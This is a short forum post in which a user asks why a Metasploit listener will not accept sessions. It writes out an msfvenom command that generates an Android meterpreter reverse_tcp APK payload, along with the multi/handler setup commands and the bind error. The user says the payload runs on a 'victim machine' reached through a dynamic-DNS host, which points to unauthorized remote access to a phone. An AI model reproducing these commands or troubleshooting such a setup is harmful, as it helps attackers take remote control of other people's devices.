Metasploit Can't Listen

Apr 21, 2017 11:33 PM

first , i download no-ip in my linux machine after i create an account ........

i checked the host name by pinging it

then i create a payload :

msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= 4444 -o test.apk

" i port forwarding this port and check it ,

hostname is the ddns "

then launch METASPLOIT

msfconsole

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost

set lport 4444

exploit

Handler failed to bind to :4444:- -

Started reverse TCP handler on 0.0.0.0:4444

Starting the payload handler...

then it can't listen to any session , what is the problem? please help .

note that i make every thing in the linux machine and the payload is running at the victim machine

Step 1:

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!